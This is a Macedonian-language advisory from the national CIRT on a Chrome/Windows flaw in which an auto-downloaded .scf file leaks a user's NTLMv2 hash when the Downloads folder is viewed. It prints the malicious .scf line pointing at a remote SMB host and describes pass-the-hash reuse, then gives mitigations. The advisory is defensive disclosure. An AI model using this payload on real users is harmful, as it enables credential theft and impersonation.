MKD-CIRT National Centre for Computer Incident Response
Корисникот на Windows може без знаење да ги сподели своите параметри за најава со напаѓачот со пристапување кон папка која содржи злонамерна .scf датотека.
Се работи за комбинирање од две техники кои се познати од порано: една од операцијата Stuxnet, а другата од презентирана на Blackhat конференција од страна на истражувач за информатичка безбедност. Ранливоста се базира на начинот како веб-прегледувачот Chrome се однесува со .scf датотеките, и како Windows се однесува со истите.
SCF (Shell Command File) е формат на датотека која поддржува многу ограничен број на Windows Explorer команди, како отварање на прозорец во Windows Explorer или покажување на десктопот. Например, „Show Desktop“ командата која корисниците на Windows ја користат секојдневно е .scf датотека.
Default постапките на Chrome се такви, што Chrome автоматски ги презема датотеките за кои мисли дека се безбедни (меѓу кои и .scf датотеките), без притоа да го праша корисникот. Ова значи дека ако корисникот во Chrome кликне на линк и преземе злонамерна .scf датотека, таа ќе седи притаена во /Downloads папката сè додека корисникот не ја отвори оваа папка.
Тука стапува на сцена недостатокот во Windows оперативниот систем: само со прегледување на папката се предизвикува Windows да се обиде да ја вчита иконата асоцирана со .scf датотеката. За да ја вчтита иконата, корисничкиот компјутер ќе ги презентира корисничките параметри (корисничкиот ID и хешираната лозинка) на серверот.
Со ова, корисничките параметри можат да му станат достапни на злонамерниот хакер.
Корисничкиот ID и хешираната лозинката ќе бидат испратени на серверот нa напаѓачот, ако .scf датотеката го содржи кодот:
[Shell]IconFile=\\170.170.170.170\iconСо оглед на тоа што се работи за NTLMv2 хеширана лозинка, за напаѓачот од добиените податоци да ја извади нехешираната лозинка е потребен т.н. со „напад со сирова сила“ (англиски: brute-force attack). Сепак, и без да ја знае лозинката, напаѓачот може да ги употреби корисничкиот ID и хешот од лозинката кај други надворешни сервиси кои прифаќаат ист вид на автентикација (нпр. Microdoft Exchange), за лажно да се претстави како жртвата.
Додека корисниците чекаат на закрпа од Google, корисниците на Chrome можат да се заштитат со следните чекори:
- Во Google Chrome да отворат Settings,
- Најдолу на страната Settings да кликнат на Advanced Settings
- Во делот за Downloads да штиклираат „Ask where downloaded files are to be saved”
Вака, пред да ја зачува .scf датотеката, Chrome ќе биде приморан да го праша корисникот за локацијата каде што датотеката ќе биде зачувана, со што му дава на корисникот контрола и можност да не ја зачува злонамерната датотека.
За понапредна заштита може да се блокираат излезните SMB барања на firewall, со што же се спречат локалните компјутери да контактираат со далечински SMB сервери
Извор: bleepingcomputer.com